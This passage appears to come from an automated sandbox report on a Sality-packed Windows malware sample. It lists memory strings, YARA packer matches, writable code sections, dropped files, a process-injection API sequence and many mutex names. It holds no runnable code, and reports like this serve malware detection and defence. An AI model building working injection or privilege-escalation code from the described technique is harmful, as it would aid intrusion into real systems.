        Source: SearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2039358482.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2098176257.0000024B58760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983552911.0000024B4248E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1990860553.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
        Source: SearchApp.exe, 00000013.00000000.1990860553.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.comm

        System Summary

        barindex
        Source: 0.2.RHxJqGoGFB.exe.8f0cc4.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 0.2.RHxJqGoGFB.exe.8c0d78.6.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 0.2.RHxJqGoGFB.exe.8d0000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: RHxJqGoGFB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: odnhm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: rkuso.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: clmaq.pif.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile created: C:\Windows\4451fdJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile deleted: C:\Windows\4451fdJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_008FE3290_2_008FE329
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00906CD00_2_00906CD0
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_008FB6140_2_008FB614
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 35_2_007F038635_2_007F0386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 36_2_00C9038636_2_00C90386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 37_2_0129038637_2_01290386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 38_2_00F6038638_2_00F60386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 39_2_00DA038639_2_00DA0386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 40_2_007D038640_2_007D0386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 41_2_00B9038641_2_00B90386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 42_2_00BB038642_2_00BB0386
        Source: RHxJqGoGFB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        Source: 0.2.RHxJqGoGFB.exe.8f0cc4.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 0.2.RHxJqGoGFB.exe.8c0d78.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 0.2.RHxJqGoGFB.exe.8d0000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: RHxJqGoGFB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: odnhm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: rkuso.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: clmaq.pif.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: clmaq.pif.0.drStatic PE information: Section .text
        Source: rkuso.exe.0.drStatic PE information: Section .text
        Source: odnhm.exe.0.drStatic PE information: Section .text
        Source: RHxJqGoGFB.exeStatic PE information: Section: .data ZLIB complexity 0.9951991889312977
        Source: classification engineClassification label: mal100.spre.evad.winEXE@4/7@0/100
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00901EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_00901EF6
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00902514 CreateToolhelp32Snapshot,Process32First,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,Process32Next,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,CloseHandle,0_2_00902514
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_5484_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_4812_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4032_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_492_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5480_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_4444_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6768_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\conhost.exeM_7308_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2996_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1252_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\sppsvc.exeM_1804_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2268_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\searchapp.exeM_4984_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6624_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6612_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_776_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2528_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6680_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_5000_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\upfc.exeM_4908_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5296_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4872_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2616_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\services.exeM_620_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_4248_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6560_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1496_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1840_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6584_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_752_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6192_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6180_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\registryM_92_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\backgroundtaskhost.exeM_3452_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2488_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7160_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_872_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7040_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2748_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7064_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3456_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6488_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5728_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6464_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_5860_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_732_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4468_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\applicationframehost.exeM_5736_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1948_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\officeclicktorun.exeM_2552_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7080_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2908_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_1760_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_592_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6752_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6776_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6384_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1652_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_5544_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1296_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\dashost.exeM_3404_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5984_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5548_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2632_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_4108_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3528_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6656_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1176_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\wmiadap.exeM_3716_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6632_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6264_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\winstore.app.exeM_2524_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_3332_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1328_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1316_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2388_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_7732_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6916_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5108_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6536_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1044_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2648_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6960_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2624_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6512_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7136_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_364_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_1532_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2012_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2036_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4196_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6416_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\sihost.exeM_3420_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_3604_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_1904_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6840_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7016_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\sgrmbroker.exeM_3980_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_1928_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_5460_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1956_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2152_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2544_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\memory compressionM_1476_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6704_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6728_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5704_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6300_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_5116_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1200_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2564_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2540_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2828_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6392_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1824_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\shellexperiencehost.exeM_7460_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\startmenuexperiencehost.exeM_4660_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_552_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_1376_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5100_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3536_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5572_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_1352_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6228_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2900_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_4504_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_628_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1552_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\audiodg.exeM_4920_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_408_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6260_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_7592_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2396_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4600_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6948_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_356_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6900_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_6284_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6992_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_2288_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3768_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_3548_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6872_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\rhxjqgogfb.exeM_7300_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\explorer.exeM_2580_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6480_
